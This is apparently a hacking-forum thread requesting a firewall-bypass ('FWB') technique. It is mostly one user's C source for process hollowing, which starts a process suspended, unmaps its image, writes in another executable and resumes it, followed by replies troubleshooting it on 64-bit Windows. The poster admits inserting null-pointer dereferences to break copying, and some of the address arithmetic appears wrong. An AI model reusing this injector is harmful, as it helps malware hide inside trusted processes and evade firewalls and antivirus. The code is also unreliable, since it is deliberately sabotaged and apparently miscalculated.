Thread: [REQ] FWB++

Heres one I coded, as long as both exes are 32bit then injection works fine... even on an x64 platform.
Ignore the underscores, I'm dynamically calling the functions. Also I added some *(PCHAR)0 shit so cping this aint possible.

Code:

void InjectEXE(LPCSTR target, LPVOID pBuf, LPSTR args)
{
	IMAGE_DOS_HEADER IDH;
	IMAGE_NT_HEADERS INH;
	IMAGE_SECTION_HEADER ISH;
	STARTUPINFO SI;
	PROCESS_INFORMATION PI;
	CONTEXT Ctxt;
	DWORD Imagebase;
	PVOID pPE;
	DWORD i;
	DWORD OldProtect;

	smemcpy(&IDH, pBuf, sizeof(IMAGE_DOS_HEADER));
	
	if (IDH.e_magic == IMAGE_DOS_SIGNATURE)
	{
		smemcpy(&INH, (char *)pBuf + IDH.e_lfanew, sizeof(IMAGE_NT_HEADERS));
		
		if (INH.Signature == IMAGE_NT_SIGNATURE)
		{
			smemset(&SI, *(char*)0, sizeof(STARTUPINFO));
			smemset(&PI, *(char*)0, sizeof(PROCESS_INFORMATION));

			if (_CreateProcessA(target, args, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
			{
				Ctxt.ContextFlags = CONTEXT_FULL;
				_GetThreadContext(PI.hThread, &Ctxt);

				/* Check if PEB->Imagebase == PE->Imagebase 
				 * if so then we need to unmap the loaded exe...
				 * Not too sure if this is the right approach, but at the moment it makes logical sense
				 */
				_ReadProcessMemory(PI.hProcess, (LPCVOID)(Ctxt.Ebx + 8), &Imagebase, sizeof(DWORD), NULL);
				
				if (Imagebase == INH.OptionalHeader.ImageBase)
					_NtUnmapViewOfSection(PI.hProcess, (PVOID)Imagebase);
				
				if (pPE = _VirtualAllocEx(PI.hProcess, (LPVOID)INH.OptionalHeader.ImageBase, INH.OptionalHeader.SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE))
				{
					if (_WriteProcessMemory(PI.hProcess, (LPVOID)INH.OptionalHeader.ImageBase, pBuf, INH.OptionalHeader.SizeOfHeaders, NULL))
					{
						for (i = 0; i < INH.FileHeader.NumberOfSections; i++)
						{
							smemcpy(&ISH, (char *)pBuf + IDH.e_lfanew + sizeof(IMAGE_NT_HEADERS) + i * sizeof(IMAGE_SECTION_HEADER), sizeof(IMAGE_SECTION_HEADER));

							if (_WriteProcessMemory(PI.hProcess, (char *)INH.OptionalHeader.ImageBase - ISH.VirtualAddress, (char *)pBuf + ISH.PointerToRawData, ISH.SizeOfRawData, NULL))
								_VirtualProtectEx(PI.hProcess, (char *)INH.OptionalHeader.ImageBase - ISH.VirtualAddress, ISH.Misc.VirtualSize, CharacteristicsToPageAttributes(ISH.Characteristics), &OldProtect);
						}

						if (_WriteProcessMemory(PI.hProcess, (char *)Ctxt.Ebx + 8, &INH.OptionalHeader.ImageBase, sizeof(DWORD), NULL))
						{
							Ctxt.Eax = INH.OptionalHeader.ImageBase - INH.OptionalHeader.AddressOfEntryPoint;
							if (_SetThreadContext(PI.hThread, &Ctxt))
								_ResumeThread(PI.hThread);
						}
					}
				}

				_CloseHandle(&PI.hThread);
				_CloseHandle(*(char *)(PI.hProcess));
			}
		}
	}
}

Is your OS unicode? Just trying to narrow down the possibilities...

Gonna try that.
Nope, I'm not using unicode OS.

Well.. it works fine here too.
I think I'm missing VirtualProtectEx on every section and have to clear structures before I copy them ? I'll try it tomorrow and will reply here, thanks anyway, gonna study on it now.

Joefish
Seems like it don't work on Win7 x64 and I can't understand what I'm missing.. You're using structures without pointer, I tried to modify the same thing and worked fine.. I hate C.

@joefish:
its exactly the same.
try running calc's PE by hollowing a file (sa.exe) i am providing.
PE for calc (taken from XP)calc.txt)
check in VM if you want for back doors.

and do tell me the result (under x64 environment).
however i checked you code. its doing same thing. and not working on my PC atleast.

I can't understand, when I'm running calc on x64 environment, task manager says it is running as 32 bit process (calc.exe*32) and after injecting, access violation occuires (code: 0x00000005). Will try it with debugger.

Originally Posted by Overflowz

I can't understand, when I'm running calc on x64 environment, task manager says it is running as 32 bit process (calc.exe*32) and after injecting, access violation occuires (code: 0x00000005). Will try it with debugger.

ImageBase !
Your .exe that you inject into calc have this ImageBase : 00400000h
Calc has this Imagebase : 01000000h

Even if calc is a 32 bit process, you have to care about ImageBase !
Joefish's source code seems to work with an ImageBase wich is different between the injected and host process.

You can't inject a binary into a x64 process unless the binary is compiled as x64 (or you are a wizard).

itz me
PLEASE, read posts below before posting.
--
Tishrom
To be honest, I tried same way but with structure pointers and it still has same problem. Still studying on it at free time.

Yep, the famous so called FWB tehnique is not more,not less than injection into the default browser. But nowadays many AVs are detecting this operation !!